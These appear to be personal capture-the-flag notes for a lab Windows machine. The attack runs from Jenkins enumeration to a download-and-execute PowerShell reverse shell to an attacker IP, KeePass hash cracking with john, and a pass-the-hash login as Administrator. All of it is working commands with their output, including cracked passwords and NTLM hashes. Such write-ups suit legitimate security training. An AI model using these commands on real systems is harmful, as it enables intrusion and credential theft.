2 :50000

===============================================================
2021/05/01 18:17:18 Starting gobuster in directory enumeration mode
===============================================================
/askjeeves            (Status: 302) [Size: 0] [--> http://10.10.10.63:50000/askjeeves/]

http://10.10.10.63:50000/askjeeves/
shows a Jenkins dashboard

Created a new job > Windows Batch Command
powershell iex (New-Object System.Net.WebClient).DownloadString('http://10.2.74.151:8888/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 10.2.74.151 -Port 6969

PS C:\Users\Administrator\.jenkins\workspace\revshell>whoami
jeeves\kohsuke

whoami /priv
Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

syteminfo
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.10586 N/A Build 10586
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00331-20304-47406-AA297
Original Install Date:     10/25/2017, 4:45:33 PM
System Boot Time:          5/2/2021, 2:23:20 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC


[idk why but eh why not; this is admin password on jekins]
C:\Users\Administrator\.jenkins\secrets> more initialAdminPassword
ccd3bc435b3c4f80bea8acca28aec491

Found CEH.kdbx file under Documents

$ keepass2john CEH.kdbx > ceh.hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt --format=KeePass ceh.hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1       (CEH)
1g 0:00:00:09 DONE (2021-05-01 19:32) 0.1051g/s 5780p/s 5780c/s 5780C/s nick18..moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Found this under administrator
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 

$ pth-winexe -U Administrator%'aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00' //10.10.10.63 cmd.exe                                                                     1 ⨯
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
jeeves\administrator

dir /R can be used to see alternate data streams for the root.txt
powershell Get-Content -Path "hm.txt" -Stream "root.txt"

Last updated